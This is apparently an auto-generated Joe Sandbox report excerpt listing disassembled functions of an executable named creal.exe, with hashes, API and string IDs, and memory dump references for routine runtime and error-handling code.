                                                                                                                                                                                                                • Instruction ID: 5ccd41a4399e9403ee1eaca4f2147d8874afd4f7588eb5dec88aa7fc0b05bd00
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3273ad673f3a21db5857e5805e11896850ae06cc08c5864d6916b14b2a868b9d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F511A163E2C20781FA686371C45117B29814F46F70F484BB9DA3ECA2F6ED2DB4027241
                                                                                                                                                                                                                Function 00007FF67A6165B4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: verbose
                                                                                                                                                                                                                • API String ID: 3215553584-579935070
                                                                                                                                                                                                                • Opcode ID: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
                                                                                                                                                                                                                • Instruction ID: 1dff5ce0a92c418dc72e63c143c1223ab48bd9d1793bb0373135e2b3505386e2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6291F02FA2864681F7618A25D41037F3BA5EB00F54F848176DA5EC33E5DF3CE401A342
                                                                                                                                                                                                                Function 00007FF67A6206A8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                • Opcode ID: 8562a2ddaa4935eebf24a1799f06cf0f98d553335d1454eb5137ecb29e0aa9bc
                                                                                                                                                                                                                • Instruction ID: 88425335e2ba8fc54f9612d97456bf7436ddc7f1fe136030b064555ac45a4607
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8562a2ddaa4935eebf24a1799f06cf0f98d553335d1454eb5137ecb29e0aa9bc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1081A177E2820385FB65EF25811027B26A0AB14F44F5790B5CA4AD7AF5CF2DED01B781
                                                                                                                                                                                                                Function 00007FF67A60F0D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                • Opcode ID: 93df84ad8f7e49cea4bf2fe45b974ce3ad7a793f20ece70ff6f590e0afe80a83
                                                                                                                                                                                                                • Instruction ID: 35eb58c1c24167a4313f1512aa198f3426d3dd07cd1f4d77e448c3d2d02ac31c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93df84ad8f7e49cea4bf2fe45b974ce3ad7a793f20ece70ff6f590e0afe80a83
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B61AD37A28B458AE710CFA5D0807AE77A0FB58B88F044265EF4D57BA8CF78E095D700
                                                                                                                                                                                                                Function 00007FF67A60F434 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                • Opcode ID: bb0dbae594e6361f888f3677e997f8fccf17b68f1c0f59f7e08c923b6417c7cb
                                                                                                                                                                                                                • Instruction ID: 508dde53a6a646afa3654245560e1c507038bca9c85cdf04ba4bdfb270ff5c6d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb0dbae594e6361f888f3677e997f8fccf17b68f1c0f59f7e08c923b6417c7cb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE51817393824286EA648F159184A6B77A0FB54F88F188175DB9DC7BF6CF3CE4909700
                                                                                                                                                                                                                Function 00007FF67A602890 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                                                • API String ID: 1878133881-2410924014
                                                                                                                                                                                                                • Opcode ID: 6a476509950944f0bc5995eed920a659af08b50e3adf8d3da3d7a8787779b220
                                                                                                                                                                                                                • Instruction ID: 6781f401bb95221f7dbb77fa53cbfd1134c18ab6f45aed783a2aae2ae1a6bfb1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a476509950944f0bc5995eed920a659af08b50e3adf8d3da3d7a8787779b220
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4313273638A8181E620DB10E4516EBA364FF84F84F404176E68D87AA9DF3CD645DB40
                                                                                                                                                                                                                Function 00007FF67A603ED0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,00007FF67A6039EA), ref: 00007FF67A603F01
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A6029E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF67A6088F2,?,?,?,?,?,?,?,?,?,?,?,00007FF67A60101D), ref: 00007FF67A602A14
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A6029E0: MessageBoxW.USER32 ref: 00007FF67A602AF0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFileLastMessageModuleName
                                                                                                                                                                                                                • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                                                                                                                • API String ID: 2581892565-1977442011
                                                                                                                                                                                                                • Opcode ID: 4067cf041b03358d9120c4033d5e670654b83d2b71477f60263b0e522fc37818
                                                                                                                                                                                                                • Instruction ID: 74b1206ee7c3e11d51a20934fce05a3b6e7ab7e3cda8bcdfe95cc42b64ba2076
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4067cf041b03358d9120c4033d5e670654b83d2b71477f60263b0e522fc37818
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50018423B38A4381FA64DB30D945BF71251AF4CF85F4004B1D84DC62F2EE1CE184A700
                                                                                                                                                                                                                Function 00007FF67A61CC60 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                                                • Opcode ID: ac6203f977c47ba8bc2a8f0cb0d6a0086fe2a36fe5d42d2389b6d07504d3a7ef
                                                                                                                                                                                                                • Instruction ID: a3e884d282e3ec1b72448916c9314bfd18484d367bb95023a75ffd3703291daa
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac6203f977c47ba8bc2a8f0cb0d6a0086fe2a36fe5d42d2389b6d07504d3a7ef
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50D1E173B29A8189E710CF65D4402BE3BB1FB45B98B048276CF6D97BA9DE38D406D340
                                                                                                                                                                                                                Function 00007FF67A602330 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1956198572-0
                                                                                                                                                                                                                • Opcode ID: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
                                                                                                                                                                                                                • Instruction ID: 009603fb2534576aa0a410977c1ba7c14cdf8f562ad58e0dd39d95efd77c04f3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E11A922E3814282FB589B79F54467B5392EF88F80F448070EB4946BEECD3CD4C16600
                                                                                                                                                                                                                Function 00007FF67A62638C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: ?
                                                                                                                                                                                                                • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                • Opcode ID: befcc0e810349c4ed10c4da0c5a0000f7d95c3550f016c8dbfb5e48fc73a8369
                                                                                                                                                                                                                • Instruction ID: 04182a374fd41ea113b98cc2dafed5548434cf332cc66a7c27c55dc0400061c9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: befcc0e810349c4ed10c4da0c5a0000f7d95c3550f016c8dbfb5e48fc73a8369
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE41E527A2828242FB64DF25E44137B5A60EB90FA4F148275EF9C86AF9EE3CD4419701
                                                                                                                                                                                                                Function 00007FF67A6196A4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF67A6196D6
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A61B00C: RtlFreeHeap.NTDLL(?,?,?,00007FF67A623492,?,?,?,00007FF67A6234CF,?,?,00000000,00007FF67A623995,?,?,00000000,00007FF67A6238C7), ref: 00007FF67A61B022
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A61B00C: GetLastError.KERNEL32(?,?,?,00007FF67A623492,?,?,?,00007FF67A6234CF,?,?,00000000,00007FF67A623995,?,?,00000000,00007FF67A6238C7), ref: 00007FF67A61B02C
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF67A60C0E5), ref: 00007FF67A6196F4
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                                • API String ID: 3580290477-539974950
                                                                                                                                                                                                                • Opcode ID: cbff3703d0eb5d814c918169503ff03d4f262caf6a9cc0de81f89f8799812d0b
                                                                                                                                                                                                                • Instruction ID: 03c1f7c55bf24c8bcf08dfe61fc48ef2bc305fdfad6d6b3daec90f59d1661aa6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cbff3703d0eb5d814c918169503ff03d4f262caf6a9cc0de81f89f8799812d0b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F419137A287128AFB55EF25D4500BA2BA5EF84FD4B554075FA4EC3BA5EE3DE4809300
                                                                                                                                                                                                                Function 00007FF67A61D2F8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                                                • Opcode ID: 58f62ff0c7f7b6be9e4ecb54e809448fa16189ed2b231f8d6d1ca058d2495b08
                                                                                                                                                                                                                • Instruction ID: 99f7e775e69b5ff47abe346936328572a1c483fe9679d9cf931e4b2458d77311
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58f62ff0c7f7b6be9e4ecb54e809448fa16189ed2b231f8d6d1ca058d2495b08
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A418D33B29A9195EB20DF25E4443BAA7A0FB88B94F804131EA4DC77A8DF3CE541D750
                                                                                                                                                                                                                Function 00007FF67A61FA18 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentDirectory
                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                • API String ID: 1611563598-336475711
                                                                                                                                                                                                                • Opcode ID: c120b864dc14cbd6235dd72bea219c1032bae1501d376cd0c3e10e350c6f3e5b
                                                                                                                                                                                                                • Instruction ID: 198f03eec5ef485f3cda363c04c4b3ba5be85d9396dcd7b26bd5515dc7504808
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c120b864dc14cbd6235dd72bea219c1032bae1501d376cd0c3e10e350c6f3e5b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D21D023A28681C1EB209B11D04427F77A1FB88F84F458176DB9D876A5DF7CE9459740
                                                                                                                                                                                                                Function 00007FF67A602C50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                • String ID: Error detected
                                                                                                                                                                                                                • API String ID: 1878133881-3513342764
                                                                                                                                                                                                                • Opcode ID: 6f9a1586ca547a3c2f77bf815536a5540435ab6ab19a441e761cc5e7daea12c4
                                                                                                                                                                                                                • Instruction ID: 94f62718df9f0b508cb88fa3a5d3ce9638ad0b7cb44d89bc528a9af8ba842355
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f9a1586ca547a3c2f77bf815536a5540435ab6ab19a441e761cc5e7daea12c4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B2144B3638A8691E620DB10E4916EBA354FF98B84F805175E68D87AB5DF3CD245DB00
                                                                                                                                                                                                                Function 00007FF67A602B30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                • String ID: Fatal error detected
                                                                                                                                                                                                                • API String ID: 1878133881-4025702859
                                                                                                                                                                                                                • Opcode ID: 851903317bfc7efaf1ad6cdea84b2df33a0253a3527f03e892242bbcad957f63
                                                                                                                                                                                                                • Instruction ID: a0a0ac0228c24968b4eaef46bdd3babd1267b6408c15c89c1ffa5896881747aa
